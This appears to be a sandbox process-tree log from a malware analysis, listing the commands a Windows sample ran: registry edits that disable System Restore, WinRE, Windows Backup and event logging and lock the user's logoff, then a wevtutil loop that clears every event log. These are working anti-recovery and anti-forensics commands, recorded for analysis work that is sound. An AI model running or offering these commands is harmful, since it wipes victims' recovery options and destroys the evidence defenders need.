C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe el3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe el4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "AMSI/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "AirSpaceChannel"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Application"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DirectShowFilterGraph"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DirectShowPluginControl"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Els_Hyphenation/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "EndpointMapper"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "FirstUXPerf-Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "ForwardedEvents"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "General Logging"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "HardwareEvents"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "IHM_DebugChannel"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Internet Explorer"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Key Management Service"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MF_MediaFoundationDeviceMFT"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MF_MediaFoundationDeviceProxy"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MF_MediaFoundationFrameServer"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MedaFoundationVideoProc"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MedaFoundationVideoProcD3D"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationAsyncWrapper"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationContentProtection"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationDS"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationDeviceProxy"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationMP4"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationMediaEngine"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPerformance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPerformanceCore"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPipeline"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPlatform"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationSrcPrefetch"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IE/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AAD/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AAD/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ADSI/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ASN1/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ATAPort/General"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppHost/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppHost/Internal"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppID/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppSruProv"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Steps-Recorder"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppxPackaging/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppxPackaging/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppxPackaging/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AssignedAccess/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AssignedAccess/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AsynchronousCausality/Causality"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/GlitchDetection"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/Informational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/PlaybackManager"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audit/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUser-Client"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/HCI"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/L2CAP"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Backup"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Battery/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Biometrics/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker-Driver-Performance/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Management"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker/Tracing"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bluetooth-Bthmini/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bluetooth-Policy/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheMonitoring/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CAPI2/Catalog Database Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CDROM/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/ApartmentInitialize"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/ApartmentUninitialize"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/Call"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/CreateInstance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/ExtensionCatalog"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/FreeUnusedLibrary"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/RundownInstrumentation"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COMRuntime/Activations"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COMRuntime/MessageProcessing"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Cleanmgr/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"3⤵
-
